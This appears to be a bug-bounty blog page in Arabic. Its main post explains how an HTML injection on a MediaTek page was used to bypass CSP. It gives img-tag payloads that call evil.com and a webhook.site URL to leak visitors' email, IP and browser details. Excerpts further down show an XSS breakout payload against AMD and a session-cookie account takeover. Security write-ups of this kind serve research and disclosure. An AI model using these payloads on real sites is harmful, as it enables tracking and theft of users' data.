Skip to main content

Session leak & CORS misconfiguration lead to account takeover

Mediatek CSP Bypass ( Arabic )

 

السلام عليكم 

 CSPفي هذه المقالة سوف اتحدث عن ثغرة تخطي ال

؟CSP ما هو ال

هذه المقالة باللغة العربية تتكلم عنه

CSP ( Arabic )

بعد القراءة هي بنا الي الشرح

 content النطاق الخاص بميدياتيك كان هناك به براميتر باسم

و كان يقوم بتخزين القيمة في الصفحة 


 اذا سوف نحاول كسر السطر حتي نتمكن من كتابة الكود الخاص بنا

 XSSو الحصول علي ثغرة


 كما نرا انه تم كسر الحاجز و يتم كتابة الكود الخاص بنا

اذا هيا نحاول تنفيذ كود جافاسكربت


 

 كما نرا انه قام بحذف الكود و بداء بتشفيرة 

اذا هو يقبل بعض الاشارات و الاشارات الاخري لا

كما نرا يتم حقن الكود الخاص بنا  

HTML اذا الي الان نحن معانا فقط ثغرة حقن كود

ولكن في هذه الحالة خطورتها منخفضة كيف نرفع من خطورتها 

فل نحاول ان نعرف اذا كان يقبل الاشارة الخاصة بالصور

<img>

اذا عند وضح محتوي مسار الصورة 

سوف يقوم المتصفح بطلب الصورة من المسار الخاص بها

سواء كان موقعا او مسار محلي

و الان فل نذهب الي الرابط بعد اضافة الكود الخاص بنا

<img src="http://evil.com">

سوف يقوم بطلب الرابط من خلال النطاقات الموثوقة فقط مثال

https://mediatek.com/http://evil.com

لكن بطريقة بسيطة لتخطي ذلك نضع

<img src="/\/evil.com/">

وسوف يتم طلب الموقع نفسة مثال

evil.com/  

سوف نرا انه قام بطلب الموقع منفردا

evil.com/

و الان ما هو الضرر

يمكنك هنا تتبع المستخدمين و سرقة معلومات منهم مثل نظام التشغيل و المتصفح و عنوان الانترنت و غيره

و ايضا لان الموقع الخاص بميدياتيك كان يقوم بارسال البريد الالكتروني في الرابط يمكنك سرقته 

سوف نستخدم 

webhook.site

كمثال ليصبح الكود بالشكل التالي

<img src="/\/webhook.site/c49c55af-1f55-451f-bfd2-ed04b20d5b24" >

و عند الذاهب الي الرابط و بعدها الذاهب الي الموقع


 

سوف نرا اننا تمكنا من تتبع المستخدم وسرقة المعلومات منه

الان اذا وجدت ثغرة 

HTML Injection 

 XSSفي المرة القادمة تعرف ماذا تفعل بها اذا لم تستطيع الحصول علي

وفقك الله و اكرمكم 

 السلام عليكم ورحمة الله

 

Comments

Popular posts from this blog

Subdomain Enumeration (Arabic)

ازاي تكبر scope الخاص بالtarget? السلام عليكم  كلنا خلال عملية تجميع الSubdomains دايما بنخش نجيب الtargetو نطلع الSubdomains  و نشوف ال live فيهم و بس كدا نكمل و الscope يكون فيه بتاع 20 subdomain و خلاص كدا و طبعا اكيد في اشخاص كتير من قبلك دخلو عليهم و عملو منهم بطاطس بس دايما مش معني ان كلو دخل هنا يبقي مش هلاقي حاجة  لا اكيد هتلاقي لان كل الي بيخش اكيد مش بيفكرو زيك وكل واحد له طريقة بالتفكير بس الموضوع بيبقي اصعب فا الفكرة من ان الscope بتاعك يبقي كبير انك تجيب subdomains او endpoints ميكونش حد شافها او عدد قليل قام بزيارتها فا بالتالي فرصتك بتبقي اكبر  فا الموضوع بيبقا ك التالي   مثال هنا في test.com انك بتجيب الsubdomains عندنا هنا 3 subdomains فا اكيد في اشخاص كتير دخلو عليهم قبليك فا بالتالي فرصتك بتبقي قليلة  فا انت بتخش تجرب حظك و لقيت Bugs او ملقتش و خلاص كدا و بتمشي لكن لو الscope بتاع test.com عبارة عن 3 subdomains فا ازاي اكبر الscope من 3 subdomains لاكتر هو اكيد الفكرة معروفة عند البعض و البعض عارفها لكن بينسي يطبقها و هو انك بتستخرج الSubdomains بتاعت الSubdomains في

Amd XSS & WAF Bypass ( Arabic )

السلام عليكم في هذا المقال سوف نتكلم عن ثغرة  AMD ب XSS WAFو الطريقة البسيطة المستخدمة في تخطي جدار الحماية language في الرابط الخاص بل النطاق الذي كنت به هناك براميتر باسم قمت بعرض مظهر الصفحة لرؤية الاكواد   في الصفحةlanguage و كان يتم كتابة اي قيمة اعطيها ل بعد تجربة العديد من الاكواد لاستغلال الثغرة WAF لم يتنفع بسبب ال و ذلك لانه لا يقبل اي علامات و نفذت كل الافكار لدي بعد اعادة النظر في الكود الخاص بالصفحة  وجدت انه يقوم بوضع القيمة ايضا بداخل كود جافاسكربت بنهاية الصفحة كالاتي   <script>اذا الاشارة الخاصة ب موجوده و القيمة موجدة بها اذا المكان المخزن به القيمة ينتهي ب الرمز الاتي "); اذا فل نقوم بوضع الرمز الاتي اولا ثم القيمة اذا لقد قمنا بكسر السطر و القيمة الخاصة بنا يتم كتبتها بسطر جديد ولكن سوف نلاحظ ان بعد القيمة هناك رموز اخره تضاف تلقائيا اذا سوف نقوم بكتابة الكود الخاص بنا بالشكل التالي ");alert("azima سوف نرا ان الكود الخاص بنا تم اغلاق السطر تلقائيا  بسبب الرمز التي تضاف تلقائيا اذا فل نجربه الان     كما نرا تم تنفيذ الكود  و الفكرة بسيطة جدا و في

Session leak & CORS misconfiguration lead to account takeover

 Hello, everyone. This blog is about Account takeover via session leak over url on a private program. Reconnaissance & Enumeration:  After subdomain enumeration, i found a subdomain that has no pages. So, the right thing to do here is to enumrate the resources.  I strat using dirsearch & gobuster. Then, i found the following directory: test.example.com/id       I have found this json contains id and value. I tried to refresh the page many times to see if the value will change, but the value doesn't change. So, i tried to open burp suite to see the request and lol the value is the cookies value:   But the website is using Https. So i tried to see if there is any misconfigurations and the http was enabled. Also the cookies wasn't regnerated. So, we can capture the request over the http. Steps: 1- Victim open the link 2- Attacker capture the request and server response in clear text 3- Attacker use the cookies to login to victim account Note: since the http is enabled atta